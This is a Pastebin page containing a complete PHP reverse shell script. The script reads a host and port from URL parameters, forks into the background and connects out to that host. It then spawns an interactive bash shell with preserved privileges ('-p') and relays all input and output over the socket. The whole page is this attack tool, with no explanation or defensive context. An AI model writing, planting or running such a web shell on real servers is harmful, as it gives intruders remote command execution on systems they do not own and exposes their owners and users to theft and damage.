Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1 <?php
- 2 set_time_limit (0);
- 3 $VERSION = "1.0";
- 4 $ip = $_GET["ip"];
- 5 $port = $_GET["port"];
- 6 $chunk_size = 1400;
- 7 $write_a = null;
- 8 $error_a = null;
- 9 $shell = '/bin/bash -p -i';
- 10 $daemon = 0;
- 11 $debug = 0;
- 12
- 13 if (function_exists('pcntl_fork')) {
- 14 // Fork and have the parent process exit
- 15 $pid = pcntl_fork();
- 16
- 17 if ($pid == -1) {
- 18 printit("ERROR: Can't fork");
- 19 exit(1);
- 20 }
- 21
- 22 if ($pid) {
- 23 exit(0); // Parent exits
- 24 }
- 25
- 26 // Make the current process a session leader
- 27 // Will only succeed if we forked
- 28 if (posix_setsid() == -1) {
- 29 printit("Error: Can't setsid()");
- 30 exit(1);
- 31 }
- 32
- 33 $daemon = 1;
- 34 } else {
- 35 printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
- 36 }
- 37
- 38 // Change to a safe directory
- 39 chdir("/");
- 40
- 41 // Remove any umask we inherited
- 42 umask(0);
- 43
- 44 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
- 45 if (!$sock) {
- 46 printit("$errstr ($errno)");
- 47 exit(1);
- 48 }
- 49
- 50 // Spawn shell process
- 51 $descriptorspec = array(
- 52 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
- 53 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
- 54 2 => array("pipe", "w") // stderr is a pipe that the child will write to
- 55 );
- 56
- 57 $process = proc_open($shell, $descriptorspec, $pipes);
- 58
- 59 if (!is_resource($process)) {
- 60 printit("ERROR: Can't spawn shell");
- 61 exit(1);
- 62 }
- 63
- 64 // Set everything to non-blocking
- 65 // Reason: Occsionally reads will block, even though stream_select tells us they won't
- 66 stream_set_blocking($pipes[0], 0);
- 67 stream_set_blocking($pipes[1], 0);
- 68 stream_set_blocking($pipes[2], 0);
- 69 stream_set_blocking($sock, 0);
- 70
- 71 printit("Successfully opened reverse shell to $ip:$port");
- 72
- 73 while (1) {
- 74 // Check for end of TCP connection
- 75 if (feof($sock)) {
- 76 printit("ERROR: Shell connection terminated");
- 77 break;
- 78 }
- 79
- 80 // Check for end of STDOUT
- 81 if (feof($pipes[1])) {
- 82 printit("ERROR: Shell process terminated");
- 83 break;
- 84 }
- 85
- 86 // Wait until a command is end down $sock, or some
- 87 // command output is available on STDOUT or STDERR
- 88 $read_a = array($sock, $pipes[1], $pipes[2]);
- 89 $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
- 90
- 91 // If we can read from the TCP socket, send
- 92 // data to process's STDIN
- 93 if (in_array($sock, $read_a)) {
- 94 if ($debug) printit("SOCK READ");
- 95 $input = fread($sock, $chunk_size);
- 96 if ($debug) printit("SOCK: $input");
- 97 fwrite($pipes[0], $input);
- 98 }
- 99
- 100 // If we can read from the process's STDOUT
- 101 // send data down tcp connection
- 102 if (in_array($pipes[1], $read_a)) {
- 103 if ($debug) printit("STDOUT READ");
- 104 $input = fread($pipes[1], $chunk_size);
- 105 if ($debug) printit("STDOUT: $input");
- 106 fwrite($sock, $input);
- 107 }
- 108
- 109 // If we can read from the process's STDERR
- 110 // send data down tcp connection
- 111 if (in_array($pipes[2], $read_a)) {
- 112 if ($debug) printit("STDERR READ");
- 113 $input = fread($pipes[2], $chunk_size);
- 114 if ($debug) printit("STDERR: $input");
- 115 fwrite($sock, $input);
- 116 }
- 117 }
- 118
- 119 fclose($sock);
- 120 fclose($pipes[0]);
- 121 fclose($pipes[1]);
- 122 fclose($pipes[2]);
- 123 proc_close($process);
- 124
- 125 // Like print, but does nothing if we've daemonised ourself
- 126 // (I can't figure out how to redirect STDOUT like a proper daemon)
- 127 function printit ($string) {
- 128 if (!$daemon) {
- 129 print "$string\n";
- 130 }
- 131 }
- 132 ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement